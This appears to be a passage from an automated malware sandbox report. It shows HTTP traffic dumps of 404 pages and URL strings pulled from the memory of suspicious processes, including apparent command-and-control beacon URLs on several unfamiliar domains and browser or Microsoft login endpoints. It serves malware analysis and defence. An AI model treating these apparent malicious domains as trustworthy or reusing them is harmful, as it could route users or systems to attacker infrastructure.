                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 05:55:36 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 05:55:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:56:31 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:56:34 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:56:37 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 05:56:40 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 
68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: mobsync.exe, 00000003.00000002.3503963835.0000000005986000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.00000000039E6000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://aballanet.cat/6xrr/?rfJh=HxJAUmNG5a
                Source: zZyhwwvEVl.exe, 00000007.00000002.3504903691.0000000005911000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.brightvision.website
                Source: zZyhwwvEVl.exe, 00000007.00000002.3504903691.0000000005911000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.brightvision.website/gn26/
                Source: mobsync.exe, 00000003.00000002.3505219170.0000000007B30000.00000004.00000800.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003D0A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.canadavinreport.site/g3h7/?rfJh=dyqW
                Source: zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003B78000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.madhf.tech/0mwe/?rfJh=I6/MvosI1M4GXnAB4bTWBGDp85hsOSNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5
                Source: mobsync.exe, 00000003.00000002.3503963835.0000000005E3C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000003E9C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.thinkphp.cn
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: mobsync.exe, 00000003.00000002.3503963835.0000000006160000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.00000000041C0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn-bj.trafficmanager.net/?hh=
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfh
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: mobsync.exe, 00000003.00000002.3502781470.0000000003203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: mobsync.exe, 00000003.00000003.2048749445.0000000007DBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
                Source: mobsync.exe, 00000003.00000003.2055805532.0000000007DDD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: mobsync.exe, 00000003.00000002.3503963835.00000000062F2000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.0000000004352000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://zkdamdjj.shop/kf1m/?rfJh=gD/FPiA75bYZCbZAYB/YrW9xurwFI/r4HqBHW8I3
